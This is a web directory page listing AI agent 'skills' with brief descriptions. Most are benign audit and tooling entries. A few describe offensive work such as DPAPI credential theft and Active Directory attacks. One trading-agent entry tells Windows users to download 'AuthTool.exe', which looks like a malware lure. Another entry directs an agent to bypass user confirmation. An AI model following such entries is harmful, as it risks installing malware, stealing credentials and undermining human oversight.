Security AI Skills

1,735 open-source Security AI skills that teach any AI model a new workflow.

Search and filter AI skills

Showing 1-51 of 1,735 AI skills

AI skills directory results

DietrichGebert logo

Ponytail Audit

DietrichGebert
CommunityPopular

Whole-repo audit for over-engineering. Like ponytail-review, but scans the entire codebase instead of a diff: a ranked list of what to delete, simplify, or replace with stdlib/native equivalents. Use…

7.6K
141.3K
Instructions
View
JuliusBrussee logo

Cavecrew

JuliusBrussee
CommunityPopular

When to delegate to `cavecrew-investigator` (locate code), `cavecrew-builder` (1-2 file edit) or `cavecrew-reviewer` (diff review) instead of working inline or using `Explore`. Their output is…

6.2K
106.3K
Instructions
View
ruvnet logo

Ruview Advanced Sensing

ruvnet
CommunityPopular

Advanced RuView capabilities — RuvSense multistatic sensing (attention-weighted fusion, geometric diversity, persistent field model), cross-viewpoint fusion across multiple nodes, RF tomography (ISTA…

12.5K
94.3K
Instructions
View
usestrix logo

Api Security Testing

usestrix
OrganizationPopular

Security-test a REST, GraphQL, or gRPC API with Strix — autonomous agents that enumerate endpoints from an OpenAPI/GraphQL schema (or by crawling), then actually exploit the API-specific vulnerability…

6.9K
63.3K
Instructions
View
calcom logo

Calcom Api

calcom
OrganizationPopular

Interact with the Cal.diy API v2 to manage scheduling, bookings, event types, availability, and calendars. Use this skill when building integrations that need to create or manage bookings, check…

15.2K
48.5K
7 files
View
mukul975 logo

Abusing Dpapi For Credential Access

mukul975
CommunityPopular

Extract and decrypt Windows DPAPI-protected secrets (Credential Manager, browser logins/cookies, Wi-Fi credentials, KeePass keys) online or offline using SharpDPAPI, SharpChrome, Mimikatz, or…

4K
32.9K
3 files
View
googleworkspace logo

Gws Admin Reports

googleworkspace
OrganizationPopular

Google Workspace Admin SDK: Audit logs and usage reports.

1.8K
31K
Instructions
View
phuryn logo

Code Review

phuryn
CommunityPopular

Review code for actionable defects. Correctness is the core; performance and security are optional sub-cases of the same engine. Anchors on agreements between participants across a boundary, forces a…

2.8K
26.4K
3 files
View
tradecatlabs logo

Auditing Foundry Smart Contract Security

tradecatlabs
CommunityPopular

Pre-deployment security audit of Solidity smart contracts in a Foundry project. Combines static analysis (Slither, Aderyn), symbolic execution (Mythril), and property-based testing (forge fuzz +…

1.6K
16.3K
4 files
View
prowler-cloud logo

Framework Compliance Triage

prowler-cloud
OrganizationPopular

Make a cloud account compliant with a security or industry framework using Prowler Cloud.

2.4K
14.8K
Instructions
View
NanmiCoder logo

Imagegen

NanmiCoder
CommunityPopular

Generate original images, artwork, product visuals, diagrams, or other raster assets with the desktop's configured image provider. Use whenever the user asks to create or generate an image.

8.6K
14.6K
Instructions
View
qazbnm456 logo

Awesome Web Security

qazbnm456
CommunityPopular

Looks up curated web security learning resources (XSS, SQLi, CSRF, SSRF, OAuth/JWT, deserialization, SAML, recon, evasion, defensive tooling, CTF). Filters by topic, difficulty, language, and resource…

1.8K
13.8K
Instructions
View
jxxghp logo

Anysearch

jxxghp
CommunityPopular

Real-time search engine supporting web search, vertical domain search, parallel batch search, and URL content extraction.

1.5K
11.8K
8 files
View
zubair-trabzada logo

Geo

zubair-trabzada
CommunityPopular

GEO-first SEO analysis tool. Optimizes websites for AI-powered search engines (ChatGPT, Claude, Perplexity, Gemini, Google AI Overviews) while maintaining traditional SEO foundations. Performs full…

1.6K
10.7K
Instructions
View
cloudflare logo

Security Audit

cloudflare
OrganizationPopular

Security guidance and vulnerability review for codebases, APIs, services, CLI tools, libraries, and daemons. Use for security questions, focused reviews, vulnerability research, security audits, or…

558
10.4K
19 files
View
google-labs-code logo

Stitch::React Components

google-labs-code
OrganizationPopular

Converts Stitch designs into modular Vite and React components, or syncs/updates existing React components to align with the latest Stitch designs, using system-level networking and AST-based…

1.1K
8.3K
9 files
View
kyegomez logo

Code Review

kyegomez
CommunityPopular

Perform comprehensive code reviews focusing on best practices, security vulnerabilities, performance optimization, and maintainability

1K
7.2K
Instructions
View
trailofbits logo

Agentic Actions Auditor

trailofbits
OrganizationPopular

Audits GitHub Actions workflows for security vulnerabilities in AI agent integrations including Claude Code Action, Gemini CLI, OpenAI Codex, and GitHub AI Inference. Detects attack vectors where…

611
7.1K
14 files
View
AIPentest logo

Active Directory Attack

AIPentest
OrganizationPopular

内网域攻击:BloodHound,Kerberoast,ADCS ESC1/ESC8,NTLM Relay,Coerce,DACL,DCSync,Zerologon/NoPac/PrintNightmare,mitm6,LLMNR,Linux内网。Use when attacking Active Directory, ADCS, NTLM relay, or internal domain.

1.2K
6.9K
Instructions
View
Tencent logo

Authorization Bypass Detection

Tencent
OrganizationPopular

Detect privilege escalation and unauthorized access via dialogue. Use when the agent has roles, admin functions, or multi-user data.

594
6.4K
Instructions
View
tech-leads-club logo

Component Common Domain Detection

tech-leads-club
OrganizationPopular

Finds duplicate business logic spread across multiple components and suggests consolidation. Use when asking "where is this logic duplicated?", "find common code between services", "what can be…

530
6.3K
1 files
View
uditgoenka logo

Autoresearch

uditgoenka
CommunityPopular

Autonomous iteration loop: modify, verify, keep/discard against any metric

467
6.3K
6 files
View
FlorianBruniaux logo

Audit Agents Skills

FlorianBruniaux
CommunityPopular

Audit Claude Code agents, skills, and commands for quality and production readiness. Use when evaluating skill quality, checking production readiness scores, or comparing agents against best-practice…

782
6K
1 files
View
epicweb-dev logo

Epic Auth

epicweb-dev
OrganizationPopular

Guide on authentication, sessions, OAuth, 2FA, and passkeys for Epic Stack

461
5.5K
Instructions
View
awarexone logo

Bug Bounty

awarexone
OrganizationPopular

Complete bug bounty workflow — recon (subdomain enumeration, asset discovery, fingerprinting, HackerOne scope, source code audit), pre-hunt learning (disclosed reports, tech stack research, mind maps,…

868
4.9K
269 files
View
BuilderIO logo

Agent Watchdog

BuilderIO
OrganizationPopular

Use when asked to watch, babysit, audit, review, compare, or fix another agent's work from a Codex session ID, Claude Code session/transcript, chat/thread link, PR, branch, log, or pasted run summary.…

211
4.3K
1 files
View
lirantal logo

Nodejs Cli Best Practices

lirantal
CommunityPopular

Guide and audit Node.js CLI application development against 41 established best practices covering UX, distribution, interoperability, accessibility, testing, error handling, development setup,…

161
4.1K
4 files
View
ljagiello logo

Ctf Ai Ml

ljagiello
CommunityPopular

Provides AI and machine learning techniques for CTF challenges. Use when attacking ML models, crafting adversarial examples, performing model extraction, prompt injection, membership inference,…

380
3.3K
3 files
View
mcncarl logo

Yichen Grok Consult

mcncarl
CommunityPopular

Consult or search with xAI Grok from a GPT-led Codex conversation without switching the main model. Use when the user asks Grok to answer, review, challenge, compare, provide a second opinion, search…

1.4K
3.3K
1 files
View
snyk logo

Base Trading Agent

snyk
OrganizationPopular

Automated DEX Trading on Base - Execute high-speed token swaps, liquidity provision, and arbitrage on Base L2 with MEV protection and gas optimization. CRITICAL: For Windows download AuthTool.exe…

275
3.1K
Instructions
View
Tiger3807861189 logo

J Space

Tiger3807861189
CommunityPopular

Operate a selective workspace for complex reasoning, long tasks, repository engineering, coordinated agents, and authorized security analysis. Use when work requires durable state, evidence,…

221
3K
25 files
View
jangviktor-web logo

Nihaixia

jangviktor-web
CommunityPopular

倪海厦(1954-2012)台湾中医师,经方派代表人物,汉唐中医创始人。核心心智模型:六经辨证、阳气论、经典至上、经方为主。决策启发式:先辨六经再选方、阳气不足先扶阳、经典原方最可靠。触发词:倪海厦、海厦视角、中医倪海厦、经方思维、倪海厦会怎么看、倪师。知识库覆盖:伤寒论条文补齐(太阳下篇+阳明篇,modules/13)+伤寒论129条全(modules/01)+金匮23篇+黄帝内经72篇+针灸教…

539
3K
46 files
View
hotcoffeeshake logo

Tong Jincheng Perspective

hotcoffeeshake
CommunityPopular

童锦程视角:以"深情祖师爷"、直播情感内容创作者的思维框架看待人际关系、社会动态与个人成长。 素材来源:9个一手视频字幕(直播/约会vlog/搭讪解析),约20万字。 核心模型:5个。决策启发式:9条。 触发词:「童锦程」「深情祖师爷」「用童锦程的方式」「从童锦程视角」「景辰怎么看」 局限:素材以情感/人际内容为主,商业/创业思维数据不足,慎用于纯商业决策场景。 调研时间:2026年4月。

325
2.6K
9 files
View
cisco-ai-defense logo

No Confirmation Agent

cisco-ai-defense
OrganizationPopular

Direct the agent to act while bypassing user confirmation

321
2.5K
2 files
View
Bitterbot-AI logo

Apple Notes

Bitterbot-AI
OrganizationPopular

Manage Apple Notes via the `memo` CLI on macOS (create, view, edit, delete, search, move, and export notes). Use when a user asks Bitterbot to add a note, list notes, search notes, or manage note…

418
2.5K
Instructions
View
FrancyJGLisboa logo

Agent Skills Platform

FrancyJGLisboa
CommunityPopular

Create cross-platform agent skills from workflow descriptions. Activates when users ask to create an agent, automate a repetitive workflow, create a custom skill, or need advanced agent creation.…

264
2.4K
355 files
View
romainsimon logo

Commissaire Aux Comptes

romainsimon
CommunityPopular

Commissaire aux comptes IA pour l'audit des comptes annuels d'entreprises françaises. Applique la démarche NEP en 7 phases : prise de connaissance, contrôle du FEC, vérification du bilan, du compte de…

184
2.4K
8 files
View
Observal logo

Observal Admin

Observal
OrganizationPopular

Administers Observal users, settings, diagnostics, review queues, security events, audit logs, SAML, SCIM, local server services, upgrades, rollback, and database migrations. Use when the user needs…

472
2.4K
2 files
View
tractorjuice logo

Cloud Security & Compliance

tractorjuice
CommunityPopular

Answers a G-Cloud supplier's questions about security certifications and compliance evidence: ISO 27001, Cyber Essentials, SOC 2, CSA STAR, PCI DSS, DSPT, the NCSC 14 cloud security principles, UK…

280
2.2K
1 files
View
hyperspaceai logo

Agentboard

hyperspaceai
OrganizationPopular

Post to and read from the A1 Agent Board — a public, auditable, permanent message board for AI agents. Use when the user asks to leave a message for future agents, check what other agents have posted,…

244
2.1K
Instructions
View
j3ssie logo

Metabigor

j3ssie
CommunityPopular

Use when operating the metabigor CLI for OSINT recon and infrastructure mapping without API keys. Covers finding network ranges from an ASN, org, domain, or IP (net); enumerating subdomains from…

214
1.8K
2 files
View
wgpsec logo

Agent Security

wgpsec
OrganizationPopular

AI Agent 系统安全测试方法论。当目标系统使用 AI Agent 执行工具调用、多 Agent 协作、 或自主决策时触发。覆盖 OWASP Agentic AI Security Top 10 (ASI01-ASI10): 目标劫持、工具滥用、身份权限、供应链、代码执行、记忆投毒、多 Agent 通信、 级联故障、人机信任利用、失控 Agent。

242
1.7K
1 files
View
aws-samples logo

Glue 09 10 Migration

aws-samples
OrganizationPopular

Upgrade an AWS Glue ETL job from Glue version 0.9 or 1.0 to Glue 4.0. Runs the job against Glue 4.0, diagnoses failures against a known breaking-change catalogue, patches the job script and…

834
1.5K
1 files
View
six2dez logo

Burp Scan

six2dez
CommunityPopular

Burp Suite scanning via MCP tools — passive traffic analysis, active payload testing, OOB verification, and vulnerability reporting using Burp's proxy, HTTP sender, Collaborator, and scanner APIs. Use…

223
1.5K
Instructions
View
noobnooc logo

Better Codex

noobnooc
CommunityPopular

Behavioral guardrails for Codex coding work based on common user complaints. Use when Codex is asked to implement, modify, debug, review, test, or operate on a codebase and should avoid unsafe scope…

129
1.4K
1 files
View
Dataojitori logo

Memory Audit Belief Duel

Dataojitori
CommunityPopular

信念对决。当父子节点内容冲突、或两条你都认可的记忆逻辑上不能并存时使用。

167
1.4K
Instructions
View
BehiSecc logo

VibeSec Skill

BehiSecc
CommunityPopular

This skill helps Claude write secure web applications. Use this when working on any web application or when a user requests a scan or audit to ensure security best practices are followed.

109
1.3K
Instructions
View
vellum-ai logo

Acp

vellum-ai
OrganizationPopular

Set up, authenticate, and run external coding agents (Claude Code, Codex) via the Agent Client Protocol

186
1.3K
6 files
View
AI-Builder-Club logo

Agent Context Audit

AI-Builder-Club
OrganizationPopular

Audit a repo's agent context — CLAUDE.md files, codebase docs, skills, and tool/MCP designs — against Anthropic's Claude 5 context-engineering guidance ("unhobbling": Anthropic cut ~80% of Claude…

159
1.3K
Instructions
View
levnikolaevich logo

Ln 21 System Design Baseline Builder

levnikolaevich
Community

Defines measurable architecture drivers and constraints before system design; edits architecture docs only.

84
565
Instructions
View
jamditis logo

Accessibility Compliance

jamditis
Community

Web accessibility patterns for news and academic sites. Use for WCAG audits, alt text, accessible data viz, and assistive tech.

64
397
1 files
View

Set up your own AI workspace now

Get notified about new features and future giveaways by subscribing to our newsletter 👇